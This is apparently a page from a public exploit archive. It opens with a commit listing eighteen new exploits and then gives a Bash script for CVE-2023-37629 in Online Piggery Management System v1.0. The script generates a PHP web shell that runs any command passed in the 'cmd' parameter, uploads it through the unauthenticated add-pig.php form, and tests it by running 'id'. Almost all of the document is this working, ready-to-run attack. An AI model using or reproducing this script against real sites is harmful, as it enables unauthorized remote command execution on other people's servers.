3a3c03321c
18 changes to exploits/shellcodes/ghdb Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution ABB FlowX v4.00 - Exposure of Sensitive Information TP-Link TL-WR740N - Authenticated Directory Transversal Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS) Blackcat Cms v1.4 - Remote Code Execution (RCE) Blackcat Cms v1.4 - Stored XSS CmsMadeSimple v2.2.17 - Remote Code Execution (RCE) CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI) CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS) Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration) Online Piggery Management System v1.0 - unauthenticated file upload vulnerability phpfm v1.7.9 - Authentication type juggling PimpMyLog v1.7.14 - Improper access control PMB 7.4.6 - SQL Injection Statamic 4.7.0 - File-Inclusion Vaidya-Mitra 1.0 - Multiple SQLi
53 lines
No EOL
1.5 KiB
Bash
Executable file
53 lines
No EOL
1.5 KiB
Bash
Executable file
#!/bin/bash
|
|
# Exploit Title: Online Piggery Management System v1.0 - unauthenticated file upload vulnerability
|
|
# Date: July 12 2023
|
|
# Exploit Author: 1337kid
|
|
# Software Link: https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html
|
|
# Version: 1.0
|
|
# Tested on: Ubuntu
|
|
# CVE : CVE-2023-37629
|
|
#
|
|
# chmod +x exploit.sh
|
|
# ./exploit.sh web_url
|
|
# ./exploit.sh http://127.0.0.1:8080/
|
|
|
|
echo " _____ _____ ___ __ ___ ____ ________ __ ___ ___ "
|
|
echo " / __\\ \\ / / __|_|_ ) \\_ )__ /__|__ /__ / /|_ ) _ \\"
|
|
echo " | (__ \\ V /| _|___/ / () / / |_ \\___|_ \\ / / _ \\/ /\\_, /"
|
|
echo " \\___| \\_/ |___| /___\\__/___|___/ |___//_/\\___/___|/_/ "
|
|
echo " @1337kid"
|
|
echo
|
|
|
|
if [[ $1 == '' ]]; then
|
|
echo "No URL specified!"
|
|
exit
|
|
fi
|
|
|
|
base_url=$1
|
|
|
|
unauth_file_upload() {
|
|
# CVE-2023-37629 - File upload vuln
|
|
echo "Generating shell.php"
|
|
#===========
|
|
cat > shell.php << EOF
|
|
<?php system(\$_GET['cmd']); ?>
|
|
EOF
|
|
#===========
|
|
echo "done"
|
|
curl -s -F pigphoto=@shell.php -F submit=pwned $base_url/add-pig.php > /dev/null
|
|
req=$(curl -s -I $base_url"uploadfolder/shell.php?cmd=id" | head -1 | awk '{print $2}')
|
|
if [[ $req == "200" ]]; then
|
|
echo "Shell uploaded to $(echo $base_url)uploadfolder/shell.php"
|
|
else
|
|
echo "Failed to upload a shell"
|
|
fi
|
|
|
|
}
|
|
|
|
req=$(curl -I -s $base_url | head -1 | awk '{print $2}')
|
|
if [[ $req -eq "200" ]]; then
|
|
unauth_file_upload
|
|
else
|
|
echo "Error"
|
|
echo "Status Code: $req"
|
|
fi |